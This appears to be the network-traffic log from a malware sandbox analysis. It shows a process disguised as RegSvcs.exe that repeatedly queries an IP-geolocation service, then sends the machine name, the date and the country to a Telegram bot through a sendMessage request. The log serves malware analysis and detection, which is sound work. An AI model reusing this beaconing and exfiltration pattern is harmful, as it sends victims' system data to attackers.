                                                                                                                          2025-01-10 22:44:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449742104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:18 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:18 UTC859INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:18 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863847
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kHPTmno%2FJ03hv8vyZvE5EcPa20RB1D0UWdmH%2BYh3vCxrsSUv%2FpFoklfchlalb9bHtnfJbkLEhqEo6%2F76V8t5bQHbNqMfCO6A8%2Fx27ysOPzOcesUqx0N5rQrLTdkCEEo1uPdnYK3L"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030dd19934388-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1567&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1744324&cwnd=221&unsent_bytes=0&cid=e1752d4d6d4a1feb&ts=157&x=0"
                                                                                                                          2025-01-10 22:44:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449746104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:19 UTC875INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:19 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863848
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FrdfozFHjr4%2Fz81eAnJvUITOc%2Bot7%2FTZIM%2BP%2FYDItTvsrwEmF1AzWNHtE7ejNLG%2FXznrlJylFgpuwRG%2FcoHO2YUJeNGi%2F5M%2FjqmXYWp%2BHi%2BLZ4cjGOnE1PaEKmnBw%2Fof0bQCcP9E"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030e508760fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1501&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1892417&cwnd=252&unsent_bytes=0&cid=8ecd4d4c608ae152&ts=138&x=0"
                                                                                                                          2025-01-10 22:44:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449750104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:20 UTC857INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:20 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863849
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cWjH4%2BApjxbyuy94hMAafqU5VJvIhtFsYNxr86nr6MGGgHt4JcmEfC3fcpJcLAalF%2F0OuahN8BH02Nurxz%2FjPg2IhEOhDLxPLBfE0M7Dc6n1ltl%2F2Cy5NpDlbl5Yk8HQkoFPUXvf"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030ec7ddf7293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1901&rtt_var=727&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1492079&cwnd=158&unsent_bytes=0&cid=75f4d6ac5920c115&ts=153&x=0"
                                                                                                                          2025-01-10 22:44:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449753104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:21 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:21 UTC857INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863850
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH3%2BWFzatl3wBAO0Gke2TvUBnqTFQl1NaN9tUPVNM%2FPElaIfizUF3eNeM9x5JCV%2BkKcRbF6yfSOylatErKVyFhtCO2pW6xaIvW6x5UFp3ZOksvMphGZWDgOt%2BFR9QHdIDKJjPdR3"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030f44fb17293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2002&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1442687&cwnd=158&unsent_bytes=0&cid=9c7b8e41a41bba2e&ts=139&x=0"
                                                                                                                          2025-01-10 22:44:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449754149.154.167.2204437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:22 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                          Host: api.telegram.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:22 UTC344INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:22 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                          2025-01-10 22:44:22 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.449756104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:28 UTC853INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:27 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863857
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imuE3CVVrNHQAy9aKTUa3uJFzJIuRh7yyVqF4qG%2FuUtKAc5dzeizgi8U01h8S2ffs0CY801O9JczfgbfI56lYGrmh2zikA%2BtkYyOlDbFxlm6htThaaF1ApOsnb4oAEw5bTJ331Dp"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000311aa8060fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1431&rtt_var=559&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1919789&cwnd=252&unsent_bytes=0&cid=c6a537ca09b620ff&ts=196&x=0"
                                                                                                                          2025-01-10 22:44:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.449757104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:28 UTC855INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:28 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863857
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fe5omeE%2F7x1etpoukkBHyUHKQHyA25EaS5IbumSLpaxLEAyBS0Ic3abphCHKVw0KuGJh%2BkdAMKIrepKdeoqmJKmoILqyiH2tQ6qYxwLyNL44WnFdqG02%2FTlgpnaGnoFp3iudlL7u"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000311f9c7c8ce0-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1847&min_rtt=1815&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1608815&cwnd=215&unsent_bytes=0&cid=071fad433e90a723&ts=138&x=0"
                                                                                                                          2025-01-10 22:44:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.449759104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:29 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:29 UTC857INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:29 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863859
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qTUD6H43PQ1RznvqJ2xRat6pNKKzyce5aE%2FgLL%2FR3n6OVQs3K6xoMxShAB3fau1Uf%2B5PUhRuFfAwYYYZfxYK2rBEe19jVjMbL6fdjBk9Cw%2BDKcIaGZB0gHjZsNjtCWRGzEXtBfbg"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 90003126ffe141ba-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1748502&cwnd=192&unsent_bytes=0&cid=6b22a1a118f250bf&ts=131&x=0"
                                                                                                                          2025-01-10 22:44:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.449761104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:31 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:31 UTC867INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:31 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863860
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oVmla1G%2FF1K87cc8F0JVmh0DiIh9sqldapP9KOY%2F7ZZk%2FEc%2FXGs5jZvAr6WlmSb9W9k0R8cvjaWwfvQI6Iw70ftpu8J7xBLp%2BK%2BsBDPz548GS6Rv4%2FT5dem%2BVM%2BIYNh0okPmZco"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000312e8a177293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2023&rtt_var=782&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1379962&cwnd=158&unsent_bytes=0&cid=5b7e6b655267e371&ts=168&x=0"
                                                                                                                          2025-01-10 22:44:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
